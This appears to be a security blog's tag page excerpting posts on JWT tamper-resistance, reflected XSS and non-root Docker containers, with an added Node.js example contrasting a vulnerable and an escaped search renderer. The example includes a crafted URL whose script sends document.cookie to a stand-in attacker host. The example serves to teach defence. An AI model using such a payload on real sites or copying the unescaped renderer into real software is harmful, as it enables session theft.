Tag: security

Why can’t you tamper with a JWT?

JWTs (JSON Web Tokens) are a very popular way of transmitting claims between systems. The token is signed by its issuer (with a shared secret for the HMAC algorithms, or with the issuer's private key for public-key algorithms such as RS256), so a verifier can check the signature and be confident that the claims were issued by a trusted entity and have not been modified since. Microservice architectures will commonly use the claims to perform access control. For example, […]

Reflected XSS

Reflected XSS attacks are a common way of tricking a user's browser into executing malicious code. I'll share one definition I found from Mozilla and unpack the key terms / concepts. When a user is tricked into clicking a malicious link, submitting a specially crafted form, or browsing to a malicious site, the injected code […]
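As an added illustration (not code from the original post), here is the classic reflected case in plain Node.js: a search page echoes the `q` query parameter back into its HTML. The vulnerable renderer interpolates the raw string, so a crafted link carrying `<script>` runs in the victim's browser; the hardened renderer HTML-escapes the value first. The page markup, parameter name and sample payload are constructed for the example.

```javascript
// Added example: a reflected-XSS sink beside its fixed version.
// Both functions build the HTML a server would send back for /search?q=...

// Escape the five characters that can break out of HTML text or attribute context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// VULNERABLE: the attacker-controlled query is reflected into the page verbatim,
// so markup inside it becomes part of the DOM and any <script> it carries executes.
function renderSearchVulnerable(q) {
  return `<html><body><h1>Results for: ${q}</h1></body></html>`;
}

// FIXED: the same page, but the reflected value is escaped for HTML text context.
// The browser now displays the payload as literal text instead of parsing it.
function renderSearchSafe(q) {
  return `<html><body><h1>Results for: ${escapeHtml(q)}</h1></body></html>`;
}

// Parse the query string the way a request handler would, so the example can be
// fed a full crafted URL rather than a pre-extracted value.
function queryParamFromUrl(url, name) {
  return new URL(url, 'http://example.test').searchParams.get(name) ?? '';
}

// Constructed malicious link of the kind a victim would be tricked into clicking.
const craftedUrl = '/search?q=%3Cscript%3Edocument.location%3D%27https%3A%2F%2Fattacker.test%2F%3F%27%2Bdocument.cookie%3C%2Fscript%3E';
const q = queryParamFromUrl(craftedUrl, 'q');

console.log(renderSearchVulnerable(q)); // reflected <script>...</script> lands in the page
console.log(renderSearchSafe(q));       // reflected as &lt;script&gt;...&lt;/script&gt;
```

Output encoding must match the context the value lands in; the escaping above is correct for HTML text and quoted attributes, but a value reflected inside a `<script>` block or a URL needs a different encoder, and a Content-Security-Policy header is a useful second layer when a sink is missed.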

Running docker container as non-root

One common misconception is that containers provide a secure, isolated environment and that it's therefore fine for processes to run as root (which is the default). I mean, it's not like it can affect the host system, right? Turns out it can, and it's called "container breakout"! With containers, you should also apply the principle […]